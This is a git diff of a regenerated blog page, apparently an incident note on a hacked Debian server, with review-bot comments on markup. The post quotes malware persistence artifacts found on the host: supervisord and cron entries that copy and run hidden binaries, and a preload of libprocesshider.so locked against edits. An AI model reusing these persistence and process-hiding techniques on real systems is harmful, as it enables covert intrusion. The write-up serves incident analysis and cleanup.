update some content

2021-10-28 14:13:06 +08:00
parent 97eb780aa4
commit 4f99455d8f
242 changed files with 1826 additions and 2616 deletions

@@ -13,7 +13,7 @@
"articleSection" : "post",
"name" : "[筆記] Debian Buster 伺服器被入侵了!\/ Debian Buster Server Been Hacked",
"headline" : "[筆記] Debian Buster 伺服器被入侵了!\/ Debian Buster Server Been Hacked",
"description" : "\x3cp\x3e上禮拜某天在開會的時候LINE不斷傳來訊息\x3c\/p\x3e\n\x3cp\x3e不過因為我向來開會都很認真(驕傲,所以都沒看,接著就變成來電了\x3c\/p\x3e\n\x3cp\x3e看來大概有啥事發生\x3c\/p\x3e\n\x3cp\x3e不過畢竟不是正職的工作就先放著吧\x3c\/p\x3e\n\x3cp\x3e後來變成連學長都直接打來告訴我某間公司的伺服器出事了客戶找不到我\x3c\/p\x3e\n\x3cp\x3e叫我趕快連進去看\x3c\/p\x3e\n\x3cp\x3e是說啊我又沒跟人家簽維護趕什麼趕\x26hellip;\x3c\/p\x3e\n\x3cp\x3e總之開完會後就了解一下狀況\x3c\/p\x3e",
"description" : "\u003cp\u003e上禮拜某天在開會的時候LINE不斷傳來訊息\u003c\/p\u003e\n\u003cp\u003e不過因為我向來開會都很認真(驕傲,所以都沒看,接著就變成來電了\u003c\/p\u003e\n\u003cp\u003e看來大概有啥事發生\u003c\/p\u003e\n\u003cp\u003e不過畢竟不是正職的工作就先放著吧\u003c\/p\u003e\n\u003cp\u003e後來變成連學長都直接打來告訴我某間公司的伺服器出事了客戶找不到我\u003c\/p\u003e\n\u003cp\u003e叫我趕快連進去看\u003c\/p\u003e\n\u003cp\u003e是說啊我又沒跟人家簽維護趕什麼趕\u0026hellip;\u003c\/p\u003e\n\u003cp\u003e總之開完會後就了解一下狀況\u003c\/p\u003e",
"inLanguage" : "en",
"author" : "Eric Chang",
"creator" : "Eric Chang",
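Review bot: the context line "inLanguage" : "en" directly below the changed description does not match the content, since the headline and description are Traditional Chinese; set the page or site language (for example zh-TW) so the JSON-LD is accurate. The switch from \x3c to \u003c is correct on its own, because \x escapes are not valid JSON. The description still carries escaped <p> markup, and a plain-text summary would be a better fit for that field.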
@@ -21,8 +21,8 @@
"accountablePerson" : "Eric Chang",
"copyrightHolder" : "Eric Chang",
"copyrightYear" : "2020",
"datePublished": "2020-07-10 09:48:24 \x2b0800 CST",
"dateModified" : "2020-07-10 09:48:24 \x2b0800 CST",
"datePublished": "2020-07-10 09:48:24 \u002b0800 CST",
"dateModified" : "2020-07-10 09:48:24 \u002b0800 CST",
"url" : "https:\/\/h.cowbay.org\/post\/debian-buster-server-been-hacked\/",
"wordCount" : "492",
"image" : "https://h.cowbay.orghttps://h.cowbay.org/images/post-default-14.jpg"",
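Review bot: the unchanged "image" line at the end of this hunk is still malformed: the base URL is doubled (https://h.cowbay.orghttps://h.cowbay.org/images/post-default-14.jpg) and a second quote precedes the comma, so the JSON-LD block will not parse even with the \u002b fix applied. Emit the image URL once in the template and drop the extra quote. The datePublished and dateModified values ("2020-07-10 09:48:24 +0800 CST") are also not ISO 8601, which schema.org expects; 2020-07-10T09:48:24+08:00 would be the equivalent.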
@@ -45,9 +45,9 @@
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css" integrity="sha384-mzrmE5qonljUremFsqc01SB46JvROS7bZs3IO2EmfFsd15uHvIt+Y8vEf7N7fWAU" crossorigin="anonymous">
<link href="https://h.cowbay.org/css/style.css?v=1632901488" rel="stylesheet" id="theme-stylesheet" type='text/css' media='all'>
<link href="https://h.cowbay.org/css/style.css?v=1634607506" rel="stylesheet" id="theme-stylesheet" type='text/css' media='all'>
<link href="https://h.cowbay.org/css/custom.css?v=1632901488" rel="stylesheet" type='text/css' media='all'>
<link href="https://h.cowbay.org/css/custom.css?v=1634607506" rel="stylesheet" type='text/css' media='all'>
<link rel="shortcut icon" href="https://h.cowbay.org/img/favicon.ico" type="image/x-icon">
<link rel="icon" href="https://h.cowbay.org/img/favicon.ico" type="image/x-icon">
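Review bot: the only change in this hunk is the ?v= value on style.css and custom.css (1632901488 to 1634607506), which looks like a build timestamp and would explain much of the 242-file churn for a commit titled "update some content". Consider fingerprinting assets by content hash so pages whose assets did not change produce no diff. The Font Awesome link already carries an integrity attribute; the two local stylesheets could get the same from the build.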
@@ -324,7 +324,7 @@ if (!doNotTrack) {
<p>然後開始紀錄邊清</p>
<p>底下是一些記錄下來的log 很亂,因為是邊清邊紀錄的關係</p>
<p>這是在某個特定日期時間被產生出來的檔案</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">/etc/allow.bak
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">/etc/allow.bak
/etc/deny.bak
/etc/fstab
/etc/sysctl.conf
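Review bot: the paragraph above this listing says the files were created at one specific date and time, but neither the timestamp nor the command that produced the list is recorded next to it; add both so the listing can be reproduced and compared against a later scan. The block is also tagged language-bash although it is a plain list of paths, so a text label would be more accurate.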
@@ -360,7 +360,7 @@ if (!doNotTrack) {
/usr/lib/systemd
/usr/lib/mysql/mysql
</code></pre></div><p>/etc/.supervisor/conf.d/sh.conf</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#f92672">[</span>program:.sh<span style="color:#f92672">]</span>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#f92672">[</span>program:.sh<span style="color:#f92672">]</span>
directory<span style="color:#f92672">=</span>/etc/
command<span style="color:#f92672">=</span>/bin/bash -c <span style="color:#e6db74">&#39;cp -f -r -- /etc/spts /bin/.sh 2&gt;/dev/null &amp;&amp; /bin/.sh -c &gt;/dev/null 2&gt;&amp;1 &amp;&amp; rm -rf -- /bin/.sh 2&gt;/dev/null&#39;</span>
autostart<span style="color:#f92672">=</span>true
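Review bot: the sh.conf block is tagged language-bash, but it is a supervisord [program:.sh] section, which is why the brackets and equals signs are highlighted as shell operators; tag it as ini in the source. It would also help readers if the post said in one sentence what the command line does, since it copies /etc/spts to /bin/.sh, runs it and deletes the copy, which makes /etc/spts the file to preserve for analysis rather than /bin/.sh.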
@@ -370,16 +370,16 @@ redirect_stderr<span style="color:#f92672">=</span>true
pidfile<span style="color:#f92672">=</span>/etc/psdewo.pid
stdout_logfile<span style="color:#f92672">=</span>/etc/usercenter_stdout
</code></pre></div><p>php.sh 這個忘了是在crontab 還是/etc/profile.d/底下看到的</p>
<pre><code>#!/bin/bash
<pre tabindex="0"><code>#!/bin/bash
cp -f -r -- /bin/shh /bin/.sh 2&gt;/dev/null
/bin/.sh -c &gt;/dev/null 2&gt;&amp;1
rm -rf -- .sh 2&gt;/dev/null
</code></pre><p>supervisor.sh</p>
<pre><code>#!/bin/bash
<pre tabindex="0"><code>#!/bin/bash
supervisord -c /etc/.supervisor/supervisord.conf &gt;/dev/null 2&gt;&amp;1
supervisorctl reload &gt;/dev/null 2&gt;&amp;1
</code></pre><p>某個 service 檔案</p>
<pre><code>[Unit]
<pre tabindex="0"><code>[Unit]
Description=.sh
Wants=network.target
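Review bot: the php.sh caption records that the author no longer remembers whether the script was found in crontab or under /etc/profile.d/, and the supervisor.sh and service blocks have no path at all; for an incident write-up, note the full path of each artifact beside its block, or mark it explicitly as unknown. These three blocks are also plain <pre><code> with no language class while the earlier ones are highlighted, so fencing them consistently in the source (bash for the scripts, ini for the unit file) would tidy the rendering.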
@@ -394,7 +394,7 @@ KillMode=process
[Install]
WantedBy=multi-user.target
</code></pre><p>syslog 部份內容</p>
<pre><code>Jul 7 06:20:01 pve CRON[12502]: (root) CMD (/sbin/httpss)
<pre tabindex="0"><code>Jul 7 06:20:01 pve CRON[12502]: (root) CMD (/sbin/httpss)
Jul 7 06:20:01 pve CRON[12499]: (root) CMD ( echo /usr/local/lib/libprocesshider.so &gt; /etc/ld.so.preload &amp;&amp; lockr +i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1)
Jul 7 06:21:01 pve CRON[14096]: (root) CMD (/usr/lib/mysql/mysql)
Jul 7 06:21:01 pve CRON[14095]: (root) CMD ( echo /usr/local/lib/libprocesshider.so &gt; /etc/ld.so.preload &amp;&amp; lockr +i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1)
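Review bot: the syslog excerpt is pasted without any explanation of what it shows. The CRON entries at 06:20:01 and 06:21:01 rewrite /etc/ld.so.preload to load /usr/local/lib/libprocesshider.so and then run lockr +i on that file every minute, alongside root cron jobs for /sbin/httpss and /usr/lib/mysql/mysql. Add a sentence under the block stating this, and that process listings taken on the host while that preload entry is in place should not be relied on.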
@@ -704,7 +704,7 @@ title="pinterest icon"></i>
</div>
<script src="https://h.cowbay.org/js/jquery.min.js"></script>
<script src="https://h.cowbay.org/js/jquerymigrate.js"></script>
<script src="https://h.cowbay.org/js/production.min.js?v=1632901488"></script>
<script src="https://h.cowbay.org/js/production.min.js?v=1634607506"></script>
</body>
</html>